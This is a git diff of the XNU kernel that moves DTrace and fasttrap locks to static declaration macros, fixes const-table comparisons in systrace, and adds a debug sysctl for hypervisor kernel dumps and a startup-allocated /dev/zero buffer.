index 7675bb322199acb849de7aafa02ef3cda7625e6a..bf61083c2d98b685f82deeb9244b64abcae5beb9 100644 (file)
 #include <sys/kauth.h>
 #include <sys/ucred.h>
 #include <sys/proc_internal.h>
+#include <sys/sysproto.h>
 #include <sys/user.h>
 #include <kern/task.h>
 #include <kern/thread.h>
 #include <vm/vm_map.h>
 
+
 /*
  * copy a null terminated string from the kernel address space into the user
  * address space. - if the user is denied write access, return EFAULT. - if
@@ -90,3 +92,4 @@ copywithin(void *src, void *dst, size_t count)
        bcopy(src, dst, count);
        return 0;
 }
+
diff --git a/bsd/dev/arm64/dtrace_isa.c b/bsd/dev/arm64/dtrace_isa.c
index 494bb7fad4501ca023424c94c9111a5249c90062..39d6988f9a537e08d6cf524ca20042aa2548728e 100644 (file)
@@ -52,9 +52,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t);
 extern dtrace_id_t      dtrace_probeid_error;   /* special ERROR probe */
 typedef arm_saved_state_t savearea_t;
 
-extern lck_attr_t       *dtrace_lck_attr;
-extern lck_grp_t        *dtrace_lck_grp;
-
 #if XNU_MONITOR
 extern void * pmap_stacks_start;
 extern void * pmap_stacks_end;
@@ -99,7 +96,7 @@ dtrace_getipl(void)
  * MP coordination
  */
 
-decl_lck_mtx_data(static, dt_xc_lock);
+static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 static uint32_t dt_xc_sync;
 
 typedef struct xcArg {
@@ -143,16 +140,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        return;
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr);
-       return;
-}
-
 
 /**
  * Register definitions
diff --git a/bsd/dev/dtrace/dtrace.c b/bsd/dev/dtrace/dtrace.c
index 36d4f82234bc71933c0c704158905af3480ba9f5..af303e6f4d603db75536dc1028cd3b4eefc8ff2c 100644 (file)
@@ -309,10 +309,14 @@ static int dtrace_module_unloaded(struct kmod_info *kmod);
  * LCK_MTX_ASSERT(&cpu_lock, LCK_MTX_ASSERT_OWNED);
  *
  */
-static lck_mtx_t       dtrace_lock;            /* probe state lock */
-static lck_mtx_t       dtrace_provider_lock;   /* provider state lock */
-static lck_mtx_t       dtrace_meta_lock;       /* meta-provider state lock */
-static lck_rw_t                dtrace_dof_mode_lock;   /* dof mode lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);                /* probe state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_provider_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* provider state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_meta_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* meta-provider state lock */
+static LCK_RW_DECLARE_ATTR(dtrace_dof_mode_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* dof mode lock */
 
 /*
  * DTrace Provider Variables
@@ -426,7 +430,7 @@ int dtrace_helptrace_enabled = 0;
 static dtrace_errhash_t        dtrace_errhash[DTRACE_ERRHASHSZ];
 static const char *dtrace_errlast;
 static kthread_t *dtrace_errthread;
-static lck_mtx_t dtrace_errlock;
+static LCK_MTX_DECLARE_ATTR(dtrace_errlock, &dtrace_lck_grp, &dtrace_lck_attr);
 #endif
 
 /*
@@ -19200,9 +19204,8 @@ static const struct cdevsw dtrace_cdevsw =
        .d_reserved_2 = eno_putc,
 };
 
-lck_attr_t* dtrace_lck_attr;
-lck_grp_attr_t* dtrace_lck_grp_attr;
-lck_grp_t* dtrace_lck_grp;
+LCK_ATTR_DECLARE(dtrace_lck_attr, 0, 0);
+LCK_GRP_DECLARE(dtrace_lck_grp, "dtrace");
 
 static int gMajDevNo;
 
@@ -19277,25 +19280,6 @@ dtrace_init( void )
                        return;
                }
 
-               /*
-                * Create the dtrace lock group and attrs.
-                */
-               dtrace_lck_attr = lck_attr_alloc_init();
-               dtrace_lck_grp_attr= lck_grp_attr_alloc_init();
-               dtrace_lck_grp = lck_grp_alloc_init("dtrace",  dtrace_lck_grp_attr);
-
-               /*
-                * We have to initialize all locks explicitly
-                */
-               lck_mtx_init(&dtrace_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_provider_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_meta_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_procwaitfor_lock, dtrace_lck_grp, dtrace_lck_attr);
-#if DEBUG
-               lck_mtx_init(&dtrace_errlock, dtrace_lck_grp, dtrace_lck_attr);
-#endif
-               lck_rw_init(&dtrace_dof_mode_lock, dtrace_lck_grp, dtrace_lck_attr);
-
                /*
                 * The cpu_core structure consists of per-CPU state available in any context.
                 * On some architectures, this may mean that the page(s) containing the
@@ -19303,9 +19287,6 @@ dtrace_init( void )
                 * is up to the platform to assure that this is performed properly.  Note that
                 * the structure is sized to avoid false sharing.
                 */
-               lck_mtx_init(&cpu_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&cyc_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&mod_lock, dtrace_lck_grp, dtrace_lck_attr);
 
                /*
                 * Initialize the CPU offline/online hooks.
@@ -19316,7 +19297,7 @@ dtrace_init( void )
 
                cpu_core = (cpu_core_t *)kmem_zalloc( ncpu * sizeof(cpu_core_t), KM_SLEEP );
                for (i = 0; i < ncpu; ++i) {
-                       lck_mtx_init(&cpu_core[i].cpuc_pid_lock, dtrace_lck_grp, dtrace_lck_attr);
+                       lck_mtx_init(&cpu_core[i].cpuc_pid_lock, &dtrace_lck_grp, &dtrace_lck_attr);
                }
 
                cpu_list = (dtrace_cpu_t *)kmem_zalloc( ncpu * sizeof(dtrace_cpu_t), KM_SLEEP );
@@ -19324,7 +19305,7 @@ dtrace_init( void )
                        cpu_list[i].cpu_id = (processorid_t)i;
                        cpu_list[i].cpu_next = &(cpu_list[(i+1) % ncpu]);
                        LIST_INIT(&cpu_list[i].cpu_cyc_list);
-                       lck_rw_init(&cpu_list[i].cpu_ft_lock, dtrace_lck_grp, dtrace_lck_attr);
+                       lck_rw_init(&cpu_list[i].cpu_ft_lock, &dtrace_lck_grp, &dtrace_lck_attr);
                }
 
                lck_mtx_lock(&cpu_lock);
@@ -19340,7 +19321,6 @@ dtrace_init( void )
                    offsetof(dtrace_string_t, dtst_next),
                    offsetof(dtrace_string_t, dtst_prev));
 
-               dtrace_isa_init();
                /*
                 * See dtrace_impl.h for a description of dof modes.
                 * The default is lazy dof.
index ffbd0bb15d4ddece6abc772d5832cf5bca67cce9..fa6dad3e72e3595721b1fe6d24f6559bd6a95b6b 100644 (file)
@@ -226,9 +226,9 @@ done:
 /*
  * cpuvar
  */
-lck_mtx_t cpu_lock;
-lck_mtx_t cyc_lock;
-lck_mtx_t mod_lock;
+LCK_MTX_DECLARE_ATTR(cpu_lock, &dtrace_lck_grp, &dtrace_lck_attr);
+LCK_MTX_DECLARE_ATTR(cyc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
+LCK_MTX_DECLARE_ATTR(mod_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 
 dtrace_cpu_t *cpu_list;
 cpu_core_t *cpu_core; /* XXX TLB lockdown? */
index 2ac848429ed8d5ff4baa734f1cba3eded5377752..cdc074485896cf60d9e39fb65d2b81b7af6ac441 100644 (file)
@@ -108,7 +108,7 @@ dtrace_fasttrap_fork(proc_t *p, proc_t *cp)
  * duty to resume the task.
  */
 
-lck_mtx_t dtrace_procwaitfor_lock;
+LCK_MTX_DECLARE_ATTR(dtrace_procwaitfor_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 
 typedef struct dtrace_proc_awaited_entry {
        struct dtrace_procdesc                  *pdesc;
index e95eb2e1fe259150f33bf06544937f9ff5f7b2e6..7129aca09fb458657a8936e0d441362959f94725 100644 (file)
@@ -145,7 +145,10 @@ static dtrace_meta_provider_id_t fasttrap_meta_id;
 
 static thread_t fasttrap_cleanup_thread;
 
-static lck_mtx_t fasttrap_cleanup_mtx;
+static LCK_GRP_DECLARE(fasttrap_lck_grp, "fasttrap");
+static LCK_ATTR_DECLARE(fasttrap_lck_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(fasttrap_cleanup_mtx,
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 
 #define FASTTRAP_CLEANUP_PROVIDER 0x1
@@ -179,7 +182,8 @@ static fasttrap_hash_t              fasttrap_provs;
 static fasttrap_hash_t         fasttrap_procs;
 
 static uint64_t                        fasttrap_pid_count;     /* pid ref count */
-static lck_mtx_t                       fasttrap_count_mtx;     /* lock on ref count */
+static LCK_MTX_DECLARE_ATTR(fasttrap_count_mtx,        /* lock on ref count */
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 #define        FASTTRAP_ENABLE_FAIL    1
 #define        FASTTRAP_ENABLE_PARTIAL 2
@@ -226,13 +230,6 @@ static const char *fasttrap_probe_t_zone_names[FASTTRAP_PROBE_T_ZONE_MAX_TRACEPO
        "dtrace.fasttrap_probe_t[3]"
 };
 
-/*
- * APPLE NOTE:  We have to manage locks explicitly
- */
-lck_grp_t*                     fasttrap_lck_grp;
-lck_grp_attr_t*                        fasttrap_lck_grp_attr;
-lck_attr_t*                    fasttrap_lck_attr;
-
 static int
 fasttrap_highbit(ulong_t i)
 {
@@ -406,7 +403,8 @@ typedef struct fasttrap_tracepoint_spec {
 
 static fasttrap_tracepoint_spec_t *fasttrap_retired_spec;
 static size_t fasttrap_cur_retired = 0, fasttrap_retired_size;
-static lck_mtx_t fasttrap_retired_mtx;
+static LCK_MTX_DECLARE_ATTR(fasttrap_retired_mtx,
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 #define DEFAULT_RETIRED_SIZE 256
 
@@ -598,7 +596,7 @@ fasttrap_setdebug(proc_t *p)
                        sprunlock(p);
                        p = PROC_NULL;
 
-                       mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident);
+                       (void) mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident, TASK_FLAVOR_CONTROL);
 
                        p = sprlock(pident.p_pid);
                        if (p == PROC_NULL) {
@@ -1521,7 +1519,7 @@ fasttrap_proc_lookup(pid_t pid)
        /*
         * APPLE NOTE: We have to initialize all locks explicitly
         */
-       lck_mtx_init(&new_fprc->ftpc_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+       lck_mtx_init(&new_fprc->ftpc_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
 
        new_fprc->ftpc_next = bucket->ftb_data;
        bucket->ftb_data = new_fprc;
@@ -1580,7 +1578,7 @@ fasttrap_proc_release(fasttrap_proc_t *proc)
         * APPLE NOTE: explicit lock management. Not 100% certain we need this, the
         * memory is freed even without the destroy. Maybe accounting cleanup?
         */
-       lck_mtx_destroy(&fprc->ftpc_mtx, fasttrap_lck_grp);
+       lck_mtx_destroy(&fprc->ftpc_mtx, &fasttrap_lck_grp);
 
        kmem_free(fprc, sizeof (fasttrap_proc_t));
 }
@@ -1663,8 +1661,8 @@ fasttrap_provider_lookup(proc_t *p, fasttrap_provider_type_t provider_type, cons
        /*
         * APPLE NOTE:  locks require explicit init
         */
-       lck_mtx_init(&new_fp->ftp_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-       lck_mtx_init(&new_fp->ftp_cmtx, fasttrap_lck_grp, fasttrap_lck_attr);
+       lck_mtx_init(&new_fp->ftp_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
+       lck_mtx_init(&new_fp->ftp_cmtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
 
        ASSERT(new_fp->ftp_proc != NULL);
 
@@ -1747,8 +1745,8 @@ fasttrap_provider_free(fasttrap_provider_t *provider)
         * APPLE NOTE:  explicit lock management. Not 100% certain we need this, the
         * memory is freed even without the destroy. Maybe accounting cleanup?
         */
-       lck_mtx_destroy(&provider->ftp_mtx, fasttrap_lck_grp);
-       lck_mtx_destroy(&provider->ftp_cmtx, fasttrap_lck_grp);
+       lck_mtx_destroy(&provider->ftp_mtx, &fasttrap_lck_grp);
+       lck_mtx_destroy(&provider->ftp_cmtx, &fasttrap_lck_grp);
 
        kmem_free(provider, sizeof (fasttrap_provider_t));
 
@@ -2652,7 +2650,8 @@ fasttrap_attach(void)
        ASSERT(fasttrap_tpoints.fth_table != NULL);
 
        for (i = 0; i < fasttrap_tpoints.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 
        /*
@@ -2670,7 +2669,8 @@ fasttrap_attach(void)
        ASSERT(fasttrap_provs.fth_table != NULL);
 
        for (i = 0; i < fasttrap_provs.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 
        /*
@@ -2689,7 +2689,8 @@ fasttrap_attach(void)
 
 #ifndef illumos
        for (i = 0; i < fasttrap_procs.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 #endif
 
@@ -2786,19 +2787,6 @@ fasttrap_init( void )
                }
 
 
-               /*
-                * Create the fasttrap lock group. Must be done before fasttrap_attach()!
-                */
-               fasttrap_lck_attr = lck_attr_alloc_init();
-               fasttrap_lck_grp_attr= lck_grp_attr_alloc_init();
-               fasttrap_lck_grp = lck_grp_alloc_init("fasttrap",  fasttrap_lck_grp_attr);
-
-               /*
-                * Initialize global locks
-                */
-               lck_mtx_init(&fasttrap_cleanup_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-               lck_mtx_init(&fasttrap_count_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-
                fasttrap_attach();
 
                /*
@@ -2813,7 +2801,6 @@ fasttrap_init( void )
                fasttrap_retired_size = DEFAULT_RETIRED_SIZE;
                fasttrap_retired_spec = kmem_zalloc(fasttrap_retired_size * sizeof(*fasttrap_retired_spec),
                                        KM_SLEEP);
-               lck_mtx_init(&fasttrap_retired_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
 
                fasttrap_inited = 1;
        }
index c399122556d6010d40d820ccda9c0c0801a73824..075227d1e9be141613c3501fc2cc1ea022b56546 100644 (file)
@@ -460,7 +460,7 @@ fbt_provide_module_kernel_syms(struct modctl *ctl)
        for (seg = firstsegfromheader(mh); seg != NULL; seg = nextsegfromheader(mh, seg)) {
                kernel_section_t *sect = firstsect(seg);
 
-               if (strcmp(seg->segname, "__KLD") == 0) {
+               if (strcmp(seg->segname, "__KLD") == 0 || strcmp(seg->segname, "__KLDDATA") == 0) {
                        continue;
                }
 
index a65e6a477f432e3ab6bbb8fc0e313590052a4f31..b06fdb36f3ab48724d86af05b183119f72141c9e 100644 (file)
@@ -206,6 +206,7 @@ const char * fbt_blacklist[] =
        CLOSURE(prf)
        CLOSURE(proc_best_name)
        CLOSURE(proc_is64bit)
+       X86_ONLY(proc_require)
        CRITICAL(rbtrace_bt)
        CRITICAL(register_cpu_setup_func)
        CRITICAL(ret64_iret)
@@ -241,6 +242,11 @@ const char * fbt_blacklist[] =
        CRITICAL(uread)
        CRITICAL(uwrite)
        CRITICAL(vstart)
+       X86_ONLY(zone_has_index)
+       X86_ONLY(zone_id_require)
+       X86_ONLY(zone_id_require_panic)
+       X86_ONLY(zone_range_contains)
+       X86_ONLY(zone_require_panic)
 };
 #define BLACKLIST_COUNT (sizeof(fbt_blacklist)/sizeof(fbt_blacklist[0]))
 
index b5a669e44363d0e464edf510286f6418af746856..49f40dcfffd9c4fb8cd17a09ab456c7ea4e8076b 100644 (file)
@@ -122,8 +122,6 @@ lockstat_probe_t lockstat_probes[] =
 };
 
 dtrace_id_t lockstat_probemap[LS_NPROBES];
-void (*lockstat_probe)(dtrace_id_t, uint64_t, uint64_t,
-    uint64_t, uint64_t, uint64_t);
 
 static dtrace_provider_id_t lockstat_id;
 
@@ -248,9 +246,6 @@ lockstat_attach(dev_info_t *devi)
                return DDI_FAILURE;
        }
 
-       lockstat_probe = dtrace_probe;
-       membar_producer();
-
        return DDI_SUCCESS;
 }
 
index 28e92734f273075ed32877514904a68de883f94b..67f056dab075a33a7be78bea1bb7b30cdbab9845 100644 (file)
@@ -972,6 +972,9 @@ sdt_argdesc_t sdt_args[] = {
        {"hv", "guest-enter", 1, 1, "uint64_t *", "guest_regs_t *" },
        {"hv", "guest-exit", 0, 0, "uint32_t", "uint32_t" },
        {"hv", "guest-exit", 1, 1, "uint64_t *", "guest_regs_t *" },
+       {"hv", "guest-error", 0, 0, "uint32_t", "uint32_t" },
+       {"hv", "guest-error", 1, 1, "uint64_t *", "guest_regs_t *" },
+       {"hv", "guest-error", 2, 2, "uint32_t", "uint32_t" },
        { NULL, NULL, 0, 0, NULL, NULL }
 };
 
index 0e483d76067fffab68be33ab60318df0e6c43709..1342e7785875b4d3a1cf25f8662cfc431bda6ba9 100644 (file)
@@ -82,9 +82,8 @@ extern const char *syscallnames[];
 #define LOADABLE_SYSCALL(a) 0 /* Not pertinent to Darwin. */
 #define LOADED_SYSCALL(a) 1 /* Not pertinent to Darwin. */
 
-extern lck_attr_t* dtrace_lck_attr;
-extern lck_grp_t* dtrace_lck_grp;
-static lck_mtx_t        dtrace_systrace_lock;           /* probe state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_systrace_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);           /* probe state lock */
 
 systrace_sysent_t *systrace_sysent = NULL;
 void (*systrace_probe)(dtrace_id_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t);
@@ -406,7 +405,6 @@ systrace_init(const struct sysent *actual, systrace_sysent_t **interposed)
                s->stsy_underlying = a->sy_callc;
                s->stsy_return_type = a->sy_return_type;
        }
-       lck_mtx_init(&dtrace_systrace_lock, dtrace_lck_grp, dtrace_lck_attr);
 }
 
 
@@ -489,10 +487,12 @@ systrace_enable(void *arg, dtrace_id_t id, void *parg)
 
        lck_mtx_lock(&dtrace_systrace_lock);
        if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying) {
+               /* It is not possible to write to sysent[] directly because it is const. */
                vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_systrace_syscall);
                ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
        }
        lck_mtx_unlock(&dtrace_systrace_lock);
+
        return 0;
 }
 
@@ -507,9 +507,20 @@ systrace_disable(void *arg, dtrace_id_t id, void *parg)
            systrace_sysent[sysnum].stsy_return == DTRACE_IDNONE);
 
        if (disable) {
+               /*
+                * The volatile qualifier keeps the compiler from optimizing away the
+                * if statement below.
+                *
+                * A compiler knows that the values in a const array cannot change at
+                * run time and could fold the comparison below to false, because it
+                * cannot see that DTrace patches dtrace_systrace_syscall into the
+                * array dynamically, violating its constness.
+                */
+               volatile const struct sysent *syscallent = &sysent[sysnum];
+
                lck_mtx_lock(&dtrace_systrace_lock);
-               if (sysent[sysnum].sy_callc == dtrace_systrace_syscall) {
-                       ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(systrace_sysent[sysnum].stsy_underlying));
+               if (syscallent->sy_callc == dtrace_systrace_syscall) {
+                       ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying,
+                           (vm_offset_t)&syscallent->sy_callc, sizeof(vm_offset_t));
                }
                lck_mtx_unlock(&dtrace_systrace_lock);
        }
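
The comment above compresses into a small stand-alone illustration. All names below are invented for the example and only mirror the reasoning given in the hunk; the real patching happens through ml_nofault_copy() as shown above.

typedef void (*handler_t)(void);

static void default_handler(void) { }
static void patched_handler(void) { }

/*
 * Initialized only with default_handler; imagine a later rewrite through a
 * non-C channel, the way ml_nofault_copy() rewrites sysent[] above.
 */
static const handler_t table[4] = {
	default_handler, default_handler, default_handler, default_handler
};

static int
is_patched(int idx)
{
	/*
	 * volatile forces an actual load of the slot; without it the compiler
	 * may reason from the const initializer that the comparison is always
	 * false and delete the branch.
	 */
	volatile const handler_t *slot = &table[idx];

	return *slot == patched_handler;
}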
@@ -605,10 +616,10 @@ typedef struct {
 #endif /* MACH_ASSERT */
 } mach_trap_t;
 
-extern const mach_trap_t              mach_trap_table[]; /* syscall_sw.h now declares this as const */
-extern int                      mach_trap_count;
+extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */
+extern const int         mach_trap_count;
 
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 /* XXX From osfmk/i386/bsd_i386.c */
 struct mach_call_args {
@@ -845,6 +856,7 @@ machtrace_enable(void *arg, dtrace_id_t id, void *parg)
        lck_mtx_lock(&dtrace_systrace_lock);
 
        if (mach_trap_table[sysnum].mach_trap_function == machtrace_sysent[sysnum].stsy_underlying) {
+               /* It is not possible to write to mach_trap_table[] directly because it is const. */
                vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_machtrace_syscall);
                ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t));
        }
@@ -865,10 +877,20 @@ machtrace_disable(void *arg, dtrace_id_t id, void *parg)
            machtrace_sysent[sysnum].stsy_return == DTRACE_IDNONE);
 
        if (disable) {
-               lck_mtx_lock(&dtrace_systrace_lock);
+               /*
+                * The volatile qualifier keeps the compiler from optimizing away the
+                * if statement below.
+                *
+                * A compiler knows that the values in a const array cannot change at
+                * run time and could fold the comparison below to false, because it
+                * cannot see that DTrace patches dtrace_machtrace_syscall into the
+                * array dynamically, violating its constness.
+                */
+               volatile const mach_trap_t *machtrap = &mach_trap_table[sysnum];
 
-               if (mach_trap_table[sysnum].mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) {
-                       ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t));
+               lck_mtx_lock(&dtrace_systrace_lock);
+               if (machtrap->mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) {
+                       ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying,
+                           (vm_offset_t)&machtrap->mach_trap_function, sizeof(vm_offset_t));
                }
                lck_mtx_unlock(&dtrace_systrace_lock);
        }
index d0ac4f6c899524134129714b3cbb08186cd1dcd9..0391f2c1897be08272e742bf69d74e6d098c9632 100644 (file)
@@ -165,15 +165,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        }
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       return;
-}
-
 /*
  * Runtime and ABI
  */
index 944df9f64644d47edb99442221052850604d591b..e3c16031246a684dd62bc165e0582dda3988e8a1 100644 (file)
 #include <i386/mp.h>
 #include <kern/kalloc.h>
 
+#if DEBUG || DEVELOPMENT
+#include <kern/hvg_hypercall.h>
+#endif
+
 
 static int
 _i386_cpu_info SYSCTL_HANDLER_ARGS
@@ -1103,4 +1107,87 @@ SYSCTL_INT(_machdep_misc, OID_AUTO, traptrace_enabled,
     CTLFLAG_KERN | CTLFLAG_RW | CTLFLAG_LOCKED,
     &traptrace_enabled, 0, "Enable/disable trap trace");
 
+
+/*
+ * Trigger a guest kernel core dump (internal only)
+ * Usage: sysctl kern.trigger_kernel_coredump = 1
+ * (option selector must be 1, other values reserved)
+ */
+
+static int
+sysctl_trigger_kernel_coredump(struct sysctl_oid *oidp __unused, void *arg1, int arg2, struct sysctl_req *req)
+{
+       int error = 0;
+       hvg_hcall_return_t hv_ret;
+       char buf[2]; // 1 digit for dump option + 1 '\0'
+
+       if (req->newptr) {
+               // Write request
+               if (req->newlen > 1) {
+                       return EINVAL;
+               }
+               error = SYSCTL_IN(req, buf, req->newlen);
+               buf[req->newlen] = '\0';
+               if (!error) {
+                       if (strcmp(buf, "1") != 0) {
+                               return EINVAL;
+                       }
+                       /* Issue hypercall to trigger a dump */
+                       hv_ret = hvg_hcall_trigger_dump(arg1, HVG_HCALL_DUMP_OPTION_REGULAR);
+
+                       /* Translate hypercall error code to syscall error code */
+                       switch (hv_ret) {
+                       case HVG_HCALL_SUCCESS:
+                               error = SYSCTL_OUT(req, arg1, 41);
+                               break;
+                       case HVG_HCALL_ACCESS_DENIED:
+                               error = EPERM;
+                               break;
+                       case HVG_HCALL_INVALID_CODE:
+                       case HVG_HCALL_INVALID_PARAMETER:
+                               error = EINVAL;
+                               break;
+                       case HVG_HCALL_IO_FAILED:
+                               error = EIO;
+                               break;
+                       case HVG_HCALL_FEAT_DISABLED:
+                       case HVG_HCALL_UNSUPPORTED:
+                               error = ENOTSUP;
+                               break;
+                       default:
+                               error = ENODEV;
+                       }
+               }
+       } else {
+               // Read request
+               error = SYSCTL_OUT(req, arg1, arg2);
+       }
+       return error;
+}
+
+
+static hvg_hcall_vmcore_file_t sysctl_vmcore;
+
+void
+hvg_bsd_init(void)
+{
+       if (!cpuid_vmm_present()) {
+               return;
+       }
+
+       if ((cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0) {
+               /* Register an OID in the sysctl MIB tree for kern.trigger_kernel_coredump */
+               struct sysctl_oid *hcall_trigger_dump_oid = zalloc_permanent(sizeof(struct sysctl_oid), ZALIGN(struct sysctl_oid));
+               struct sysctl_oid oid = SYSCTL_STRUCT_INIT(_kern,
+                   OID_AUTO,
+                   trigger_kernel_coredump,
+                   CTLTYPE_STRING | CTLFLAG_RW,
+                   &sysctl_vmcore, sizeof(sysctl_vmcore),
+                   sysctl_trigger_kernel_coredump,
+                   "A", "Request that the hypervisor take a live kernel dump");
+               *hcall_trigger_dump_oid = oid;
+               sysctl_register_oid(hcall_trigger_dump_oid);
+       }
+}
+
 #endif /* DEVELOPMENT || DEBUG */
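
A hypothetical userspace caller for the OID registered above. It assumes a DEVELOPMENT/DEBUG kernel running under a hypervisor that advertises the applepv coredump feature, and relies only on the behaviour visible in sysctl_trigger_kernel_coredump(): the new value must be the single character "1", any other selector is rejected with EINVAL.

#include <stdio.h>
#include <string.h>
#include <sys/sysctl.h>

int
main(void)
{
	char request[] = "1";   /* the only accepted selector */

	if (sysctlbyname("kern.trigger_kernel_coredump",
	    NULL, NULL, request, strlen(request)) != 0) {
		perror("kern.trigger_kernel_coredump");
		return 1;
	}
	printf("live kernel dump requested\n");
	return 0;
}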
index 06a5c74320d37315d362f96b9d3ddfd7c5bc7339..c64e6360139348c0b9ca3daf079297e586080623 100644 (file)
 #include <sys/conf.h>
 #include <sys/vm.h>
 #include <sys/uio_internal.h>
-#include <sys/malloc.h>
+
+#include <kern/zalloc.h>
 
 #include <mach/vm_types.h>
 #include <mach/vm_param.h>
 #include <vm/vm_kern.h>         /* for kernel_map */
+#include <libkern/section_keywords.h>
 
 #include <pexpert/pexpert.h>    /* for PE_parse_boot_argn */
 
@@ -103,7 +105,7 @@ extern boolean_t kernacc(off_t, size_t );
 
 #endif
 
-static caddr_t devzerobuf;
+static SECURITY_READ_ONLY_LATE(caddr_t) devzerobuf;
 
 int mmread(dev_t dev, struct uio *uio);
 int mmwrite(dev_t dev, struct uio *uio);
@@ -219,10 +221,8 @@ mmrw(dev_t dev, struct uio *uio, enum uio_rw rw)
                        error = 0; /* Always succeeds, always consumes all input */
                        break;
                case 3:
-                       if (devzerobuf == NULL) {
-                               MALLOC(devzerobuf, caddr_t, PAGE_SIZE, M_TEMP, M_WAITOK);
-                               bzero(devzerobuf, PAGE_SIZE);
-                       }
+                       assert(devzerobuf != NULL);
+
                        if (uio->uio_rw == UIO_WRITE) {
                                c = uio_curriovlen(uio);
 
@@ -254,6 +254,14 @@ fault:
 #endif
 }
 
+__startup_func
+static void
+devzerobuf_init(void)
+{
+       devzerobuf = zalloc_permanent(PAGE_SIZE, ZALIGN_NONE); /* zeroed */
+}
+STARTUP(ZALLOC, STARTUP_RANK_LAST, devzerobuf_init);
+
 #if CONFIG_DEV_KMEM
 void
 dev_kmem_init(void)
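
A minimal sketch of the startup-callback pattern adopted above, with illustrative example_* names; the macros and <kern/...> include paths are taken from this diff and the surrounding xnu tree. A buffer that used to be lazily MALLOC'd is carved out of permanent zone memory once, during the ZALLOC startup phase, and is read-only-late thereafter.

#include <kern/startup.h>
#include <kern/zalloc.h>
#include <libkern/section_keywords.h>

static SECURITY_READ_ONLY_LATE(char *) example_buf;

__startup_func
static void
example_buf_init(void)
{
	/* zalloc_permanent() hands back zero-filled, never-freed memory. */
	example_buf = zalloc_permanent(PAGE_SIZE, ZALIGN_NONE);
}
STARTUP(ZALLOC, STARTUP_RANK_LAST, example_buf_init);

The buffer is therefore guaranteed to exist, and to be zeroed, by the time mmrw() asserts on it, which is why the lazy MALLOC path above could be removed.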
index 6fc42ef7fdbd7d213c06728d7e32b97afa9da7e9..910f222882c39b6751f302cf83e04aa819079fd1 100644 (file)
@@ -60,7 +60,7 @@ static const struct cdevsw mt_cdevsw = {
 /*
  * Written at initialization, read-only thereafter.
  */
